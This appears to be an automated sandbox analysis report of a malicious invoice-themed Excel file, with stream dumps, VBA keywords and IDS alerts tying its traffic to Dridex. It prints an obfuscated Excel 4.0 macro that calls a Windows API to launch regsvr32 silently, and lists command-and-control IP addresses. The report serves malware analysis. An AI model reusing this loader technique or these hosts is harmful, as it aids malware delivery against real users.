                                                                                                  homepodd()
                                                                                                  homepodd
                                                                                                  Error
                                                                                                  Integer)
                                                                                                  bycilke
                                                                                                  Function
                                                                                                  ol).Name
                                                                                                  "!"):
                                                                                                  String
                                                                                                  "ab":
                                                                                                  Split(govs,
                                                                                                  Randomize:
                                                                                                  yellowsto(yel
                                                                                                  Next:
                                                                                                  ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                                                  yellowsto(Oa))))
                                                                                                  Integer
                                                                                                  yellowsto
                                                                                                  ol).value
                                                                                                  nimo(Int((UBound(nimo)
                                                                                                  Replace(Vo,
                                                                                                  Chr(sem.Row)
                                                                                                  Sheets(ol).Cells(homepodd,
                                                                                                  "ab"))
                                                                                                  Split(kij(ol),
                                                                                                  yellowsto(homepodd))
                                                                                                  Rnd))
                                                                                                  (Run(""
                                                                                                  "moreP_"
                                                                                                  Variant)
                                                                                                  Attribute
                                                                                                  Resume
                                                                                                  pagesREviewsd(Optional
                                                                                                  ecimovert(nimo
                                                                                                  ecimovert
                                                                                                  MsgBox
                                                                                                  VBA Code
                                                                                                  VBA File Name: Sheet1.cls, Stream Size: 1639
                                                                                                  General
                                                                                                  Stream Path:VBA/Sheet1
                                                                                                  VBA File Name:Sheet1.cls
                                                                                                  Stream Size:1639
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                                                                                                  Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                  VBA Code Keywords

                                                                                                  Keyword
                                                                                                  Index
                                                                                                  VB_Name
                                                                                                  VB_Creatable
                                                                                                  Application.OnTime
                                                                                                  VB_Exposed
                                                                                                  Long)
                                                                                                  ResizePagess()
                                                                                                  VB_Customizable
                                                                                                  "REviewsd"
                                                                                                  VB_Control
                                                                                                  MultiPage"
                                                                                                  VB_TemplateDerived
                                                                                                  MSForms,
                                                                                                  False
                                                                                                  Attribute
                                                                                                  Private
                                                                                                  VB_PredeclaredId
                                                                                                  VB_GlobalNameSpace
                                                                                                  VB_Base
                                                                                                  ResizePagess
                                                                                                  "pages"
                                                                                                  VBA Code
                                                                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                  General
                                                                                                  Stream Path:VBA/ThisWorkbook
                                                                                                  VBA File Name:ThisWorkbook.cls
                                                                                                  Stream Size:999
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                  VBA Code Keywords

                                                                                                  Keyword
                                                                                                  False
                                                                                                  VB_Exposed
                                                                                                  Attribute
                                                                                                  VB_Name
                                                                                                  VB_Creatable
                                                                                                  "ThisWorkbook"
                                                                                                  VB_PredeclaredId
                                                                                                  VB_GlobalNameSpace
                                                                                                  VB_Base
                                                                                                  VB_Customizable
                                                                                                  VB_TemplateDerived
                                                                                                  VBA Code

                                                                                                  Streams

                                                                                                  Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                                                  General
                                                                                                  Stream Path:PROJECT
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Stream Size:550
                                                                                                  Entropy:5.28107922141
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
                                                                                                  Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                                                                                                  Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                                                                                                  General
                                                                                                  Stream Path:PROJECTwm
                                                                                                  File Type:data
                                                                                                  Stream Size:86
                                                                                                  Entropy:3.24455457963
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                  Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                                                                                                  General
                                                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                                                  File Type:data
                                                                                                  Stream Size:3574
                                                                                                  Entropy:4.45079869926
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                  Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                  Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                                                  General
                                                                                                  Stream Path:VBA/__SRP_0
                                                                                                  File Type:data
                                                                                                  Stream Size:2060
                                                                                                  Entropy:3.45011283232
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
                                                                                                  Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                  Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                                                  General
                                                                                                  Stream Path:VBA/__SRP_1
                                                                                                  File Type:data
                                                                                                  Stream Size:187
                                                                                                  Entropy:1.91493173134
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                                                                                  Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                                                  General
                                                                                                  Stream Path:VBA/__SRP_2
                                                                                                  File Type:data
                                                                                                  Stream Size:363
                                                                                                  Entropy:2.21122978445
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                  Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                                                  General
                                                                                                  Stream Path:VBA/__SRP_3
                                                                                                  File Type:data
                                                                                                  Stream Size:398
                                                                                                  Entropy:2.07709195049
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                  Stream Path: VBA/dir, File Type: data, Stream Size: 820
                                                                                                  General
                                                                                                  Stream Path:VBA/dir
                                                                                                  File Type:data
                                                                                                  Stream Size:820
                                                                                                  Entropy:6.49145935167
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                  Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                  Macro 4.0 Code

                                                                                                  CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                  
                                                                                                  "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                  OLE File "/opt/package/joesandbox/database/analysis/338155/sample/INV3867196801-20210111675616.xlsm"

                                                                                                  Indicators

                                                                                                  Has Summary Info:False
                                                                                                  Application Name:unknown
                                                                                                  Encrypted Document:False
                                                                                                  Contains Word Document Stream:
                                                                                                  Contains Workbook/Book Stream:
                                                                                                  Contains PowerPoint Document Stream:
                                                                                                  Contains Visio Document Stream:
                                                                                                  Contains ObjectPool Stream:
                                                                                                  Flash Objects Count:
                                                                                                  Contains VBA Macros:False

                                                                                                  Summary

                                                                                                  Author:
                                                                                                  Last Saved By:
                                                                                                  Create Time:2020-12-07T14:38:21Z
                                                                                                  Last Saved Time:2021-01-11T14:32:26Z
                                                                                                  Creating Application:Microsoft Excel
                                                                                                  Security:0

                                                                                                  Document Summary

                                                                                                  Thumbnail Scaling Desired:false
                                                                                                  Company:
                                                                                                  Contains Dirty Links:false
                                                                                                  Shared Document:false
                                                                                                  Changed Hyperlinks:false
                                                                                                  Application Version:16.0300

                                                                                                  Streams

                                                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                  General
                                                                                                  Stream Path:\x1CompObj
                                                                                                  File Type:data
                                                                                                  Stream Size:115
                                                                                                  Entropy:4.80096587863
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: f, File Type: data, Stream Size: 178
                                                                                                  General
                                                                                                  Stream Path:f
                                                                                                  File Type:data
                                                                                                  Stream Size:178
                                                                                                  Entropy:2.56223021678
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                                                                                                  Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                  General
                                                                                                  Stream Path:i02/\x1CompObj
                                                                                                  File Type:data
                                                                                                  Stream Size:110
                                                                                                  Entropy:4.63372611993
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                                                  General
                                                                                                  Stream Path:i02/f
                                                                                                  File Type:data
                                                                                                  Stream Size:40
                                                                                                  Entropy:1.54176014818
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                                                  General
                                                                                                  Stream Path:i02/o
                                                                                                  File Type:empty
                                                                                                  Stream Size:0
                                                                                                  Entropy:0.0
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:
                                                                                                  Data Raw:
                                                                                                  Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                  General
                                                                                                  Stream Path:i03/\x1CompObj
                                                                                                  File Type:data
                                                                                                  Stream Size:110
                                                                                                  Entropy:4.63372611993
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                                                  General
                                                                                                  Stream Path:i03/f
                                                                                                  File Type:data
                                                                                                  Stream Size:40
                                                                                                  Entropy:1.90677964945
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                                                  General
                                                                                                  Stream Path:i03/o
                                                                                                  File Type:empty
                                                                                                  Stream Size:0
                                                                                                  Entropy:0.0
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:
                                                                                                  Data Raw:
                                                                                                  Stream Path: o, File Type: data, Stream Size: 152
                                                                                                  General
                                                                                                  Stream Path:o
                                                                                                  File Type:data
                                                                                                  Stream Size:152
                                                                                                  Entropy:2.68720470607
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                                                  Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                                                  Stream Path: x, File Type: data, Stream Size: 48
                                                                                                  General
                                                                                                  Stream Path:x
                                                                                                  File Type:data
                                                                                                  Stream Size:48
                                                                                                  Entropy:1.42267983198
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                                                                                                  Macro 4.0 Code

                                                                                                  CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                  
                                                                                                  "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  01/11/21-18:24:22.185984TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434916877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:23.467168TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084916980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:24.043708TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491705.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:24.043708TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491705.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:25.150480TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:25.670820TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:26.193564TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491745.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:26.193564TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491745.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:27.237676TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:27.772143TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:28.294099TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491785.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:28.294099TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491785.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:29.355540TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:29.876259TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:30.391999TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491825.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:30.391999TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491825.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:31.461232TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:31.985105TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:32.503202TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491865.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:32.503202TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491865.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:33.536548TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:34.073994TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:34.606674TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491905.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:34.606674TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491905.100.228.233192.168.2.22
